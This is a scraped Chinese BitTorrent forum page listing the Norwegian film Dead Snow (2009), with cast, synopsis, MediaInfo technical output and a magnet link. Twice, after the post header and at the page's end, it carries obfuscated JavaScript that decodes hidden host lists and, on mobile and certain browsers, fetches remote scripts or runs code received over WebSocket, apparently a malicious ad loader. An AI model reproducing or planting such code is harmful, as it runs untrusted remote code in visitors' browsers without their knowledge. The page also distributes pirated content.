死亡之雪[中文字幕].Dead.Snow.2009.1080p.BluRay.DTS.x265-10bit 8.84GB

版主小s 28天前 162

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 死亡之雪 / Dead snow / 红色的雪 / 死雪

◎片 名 D?d sn?

◎年 代 2009

◎产 地 挪威

◎类 别 喜剧 / 恐怖

◎语 言 挪威语

◎上映日期 2009-01-09

◎IMDb链接 https://www.imdb.com/title/tt1278340/

◎豆瓣评分 6.1/10 (10867人评价)

◎豆瓣链接 https://movie.douban.com/subject/3230148/

◎片 长 USA: 91 分钟

◎导 演 托米·维尔科拉 Tommy Wirkola (id:1326500)

◎编 剧 斯蒂格·弗洛德·亨里克森 Stig Frode Henriksen (id:1341500)

托米·维尔科拉 Tommy Wirkola (id:1326500)

◎演 员 维加·霍尔 Vegar Hoel (id:1341501)

斯蒂格·弗洛德·亨里克森 Stig Frode Henriksen (id:1341500)

伊芙·卡塞思·罗斯腾 Evy Kasseth R?sten (id:1190867)

安妮·达尔·托普 Ane Dahl Torp (id:1023300)

比约恩·桑德奎斯特 Bj?rn Sundquist (id:1022514)

托米·维尔科拉 Tommy Wirkola (id:1326500)

Terje Stroemstad Terje Stroemstad (id:1002636)

哈罗德·兹瓦特 Harald Zwart (id:1009280)

Matthew Weston Matthew Weston (id:1042344)

◎标 签 丧尸 / 恐怖 / 僵尸 / 挪威 / 惊悚 / 喜剧 / 血腥 / cult

◎简 介

就读于医科大学的维加德(Lasse Valdal 饰)及好友们驱车前往厄克斯尼湾附近的雪山,计划与其先行到达那里的女友莎拉(Ane Dahl Torp 饰)会合一同度假。当晚,他们从一个流浪汉(Bj?rn Sundquist 饰)那里听到流传在此地的一个恐怖传说:二战期间,一支德国部队驻扎这里,他们从当地人手中大肆搜刮金银财宝,手段残酷,贪婪无度,但在战争结束前夕该部队却被愤怒的民众杀死,只有为首的赫尔措格指挥官(?rjan Gamst 饰)极少数几个人躲进了雪山之中。

年轻人们对此当然嗤之以鼻,但随着一盒财宝的出现,埋藏在雪中的纳粹僵尸开始一一复活,准备夺回一曾属于他们的财宝……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 321387883142016738278971690330031696416 (0xF1C90E06C276484034ED21840910AA20)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.84 GiB

  8. Duration : 1 h 31 min

  9. Overall bit rate : 13.8 Mb/s

  10. Movie name : Dead Snow 2009 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-11-03 00:11:17

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 31 min

  21. Bit rate : 12.3 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.258

  31. Stream size : 7.86 GiB (89%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 31 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 989 MiB (11%)

  51. Title : German

  52. Language : German

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 25 min

  62. Bit rate : 9 480 b/s

  63. Count of elements : 818

  64. Stream size : 5.80 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 25 min

  76. Bit rate : 9 680 b/s

  77. Count of elements : 818

  78. Stream size : 5.92 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:07:03.256 : en:Chapter 02

  86. 00:15:05.446 : en:Chapter 03

  87. 00:23:46.091 : en:Chapter 04

  88. 00:30:52.184 : en:Chapter 05

  89. 00:37:12.147 : en:Chapter 06

  90. 00:47:45.988 : en:Chapter 07

  91. 00:51:29.712 : en:Chapter 08

  92. 01:01:09.875 : en:Chapter 09

  93. 01:09:01.471 : en:Chapter 10

  94. 01:16:01.891 : en:Chapter 11

  95. 01:25:12.607 : en:Chapter 12




复制代码


TAGS 恐怖 喜剧

磁力链:
  • magnet:?xt=urn:btih:072FD80C4A21533441374226C62A58E307FDC198

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};